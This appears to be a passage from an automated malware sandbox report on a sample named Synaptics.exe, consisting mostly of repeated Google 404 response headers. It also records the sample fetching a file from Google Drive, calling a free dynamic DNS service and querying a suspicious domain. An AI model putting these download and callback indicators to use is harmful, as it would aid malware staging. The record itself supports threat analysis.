                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                                Source: Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *.googlesyndication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.comgooglesandbox-cn.com*.googlesandbox-cn.com*.safenup.googlesandbox-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.com*.android.google.cn*.chrome.google.cn*.developers.google.cn equals www.youtube.com (Youtube)
                                Source: global trafficDNS traffic detected: DNS query: docs.google.com
                                Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                                Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                                Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC70QdxmDNZdx5DTEQpOmYLPo2GV89s7sNwPnTgTVf8ltExH1fG_QvaP2ga3h3u15t3l9u_V-CsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 17:20:13 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-qUNXnhYN0uqETZQepr5kFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=qh-ukOUmpKIDdd1kgysVqyDq4zWsJ3HmMeD46WA0aLR-4CYLV_2_v68_hqe_miGaxKY1bijQI_MR8_5g85RzwpdTn5SeN-ED-kuHC-65e4kwQ3LCdHoRfa9--p6JzsbuU2Mu4UYOgCEH1x6aeybzksX3kbew952WrBqFseVauF_lXWFZTMTi7f7c; expires=Wed, 25-Jun-2025 17:20:13 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4PbudubIElEXUq7-_FvvXvnoqBmoqieu386bOYLsXcjg7N4cMne8PqeghudR8srQ5vCFZpfMEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 17:20:13 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-VH_xAF7kxqJOwsiCF-cVTQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU; expires=Wed, 25-Jun-2025 17:20:13 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6YFaTmHlRFjtggrHut14_9Y0AkMcZggaCBllvmvL7PGvq9RVDODe4akCbXd9ZN0IQuContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 17:20:20 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-nIZcPLttQK9a5q7RAYtLNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4ROYDkho0iyFpPn2cOiAKc0jcqdaptPyWMDJGbcxxqFhxuZO7U3gR6Ox-2lrICTUYuBXobt_sContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 17:20:20 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-CI8PN4ccnRGAJ33L_3PUwA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7stqITSD3PgerT1bX0gZJXMPNKWyLTsQK0sgeDHedi5BeByHb7tSPiT1qpG-bZGi4mContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 17:20:26 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-j1k3x-rTkNYqY5G-xCTHiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4y0zf8AKmqhh7DNdWzjCeVamfZYOSWlMMEzuTCOlfuXMtK2sDOjMr1Jo2nZ4YDAt1bhPwVGpwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 17:20:27 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ZZMk8UVLiGh4VY-Pe_yDRA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4u0lSID1zzAXLQJG-rTuJh_Nx_Vfp50tDAkJVjOksdhwJutPRF71ygh9Hod4SND2ZHl4nQjgUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 17:20:36 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-9YTkUaGjEx_QvvEhCactiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6d5SN9AdnhOBBWLb-s1OKXjXrPz6ADKiozYqvNFa0PSZXr13es3ZnN218mBqSGqyZ9uvAE1F0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 17:20:36 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-VyPfAxRWUC7bV0sdXzrOvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5htGShh6kvz7wMa-32dSzHj10a-8EKXHMpU52ygmdbWUJFHbqdiVVEn_tdd39drgIrContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 17:20:42 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-IYmIZvZ76YfZzW5S9Z7iUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5wUy6ykN5pwT7khyQDaCCQHViKV3e01_aXLPjVhDnUC7C9VCPARsWMtSr0HyDFc2Bk5mghhJIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 17:20:42 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-cOrI6xM3zGjHgLysfm5l4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6BkFi626pl81t_2QH3VOK9OZNC4R7lAWHNndeIJ2NWQbcFzoSSnZmuj0CGQTFLMZ27Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 17:21:00 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-CKPjYxlYA21zmfc6vXULsQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7YzwNMq3rj4hf3wLmxz7m6FAHsvCig-bZMagAbBLaEGV1RwjwOkJEoSAzZMpKi5hVyContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 17:21:00 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-uiHlfDNfzY20xe66xrKXGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7bezbTf4YVUFig8YrGSvVMg-rK0mW1vmgQStP9ZrY1GOZcpiF6UXV4KCtg_NjvuF2aContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 17:21:06 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-d0vr2e4qqysaCwp9X1Q4dA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4u73FbZ8X4yjtHkxSNyApsI2hanK3wXd3ARba7e9P77czY0wSQKgZTZU1pIRHkjZDCContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 17:21:06 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-gK7g6gVI5DBWWKIEh2PX7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6Kdf3d_5lKbaiD3Hfp8rG6wdgEckqqWwYqjaWLajKjTBTEmSgx7kZfhPgz0GPViLI1Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 17:21:23 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-vgz8ewODxkqPimc7RXSEVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6zArIPqR8AdfXNuj4FoeAJqYC8o9qDzpLxjFKUr57gB8NfDKFh_274s4E1hJivsfBBContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 17:21:24 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-SNK-inYMPfjvOUB9ZgUvDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6qSj2R3Qscump2cF7Et3HSLkhWEGnCGgPBQPjGSSXY_JxKVPWZChf3hpdkKzfBCsqyKtCUgocContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 17:21:29 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-rIPq8ZrIn5_v-W2yvdGjRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
